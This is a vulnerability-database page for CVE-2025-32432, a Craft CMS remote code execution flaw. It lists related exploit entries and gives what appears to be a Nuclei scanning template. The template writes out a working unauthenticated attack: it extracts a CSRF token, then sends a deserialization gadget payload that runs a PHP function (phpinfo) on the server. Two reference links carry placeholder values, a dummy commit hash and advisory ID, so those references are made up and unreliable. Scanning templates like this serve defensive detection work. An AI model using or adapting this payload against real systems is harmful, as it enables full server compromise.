| Reporter | Title | Published | Views | Family All 43 |
|---|---|---|---|---|
| Exploit for Code Injection in Craftcms Craft_Cms | 23 Sep 202506:23 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 16 Jul 202509:23 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 15 May 202614:09 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 8 Mar 202616:59 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 30 Apr 202603:38 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 27 Apr 202508:50 | – | githubexploit | |
| Exploit for Code Injection in Craftcms Craft_Cms | 24 Jun 202610:46 | – | githubexploit | |
| CVE-2024-58136 | 10 Apr 202500:00 | – | attackerkb | |
| CVE-2025-32432 | 25 Apr 202515:15 | – | attackerkb | |
| The vulnerability of the Craft CMS content management system, related to improper code generation, allows a hacker to execute arbitrary code. | 9 Jun 202500:00 | – | bdu_fstec |
id: CVE-2025-32432
info:
name: CraftCMS - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
impact: |
Unauthenticated attackers can exploit remote code execution vulnerabilities through unsafe deserialization in the asset transform functionality, achieving complete server compromise.
remediation: |
This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
reference:
- https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
- https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
- https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
- https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
- https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 10
cve-id: CVE-2025-32432
cwe-id: CWE-94
epss-score: 0.99803
epss-percentile: 0.99956
metadata:
max-request: 2
vendor: craftcms
product: craftcms
shodan-query: http.component:"Craft CMS"
tags: cve,cve2025,craftcms,rce,vkev,vuln,kev
flow: http(1) && http(2)
http:
- raw:
- |
GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
internal: true
part: body
group: 1
regex:
- '"csrfTokenValue":"(.*?)"'
- raw:
- |
POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: {{token}}
Content-Type: application/json
{"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
- "CRAFT_"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c5ed9c3a96d72ce8509c2063c4c7ff84efc1aa29d67b8275ba37cfae90ac218b022100d0e4eb764ae2254f0f961714f9b942298e5f090171df4364a6664cb317dd8fa2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation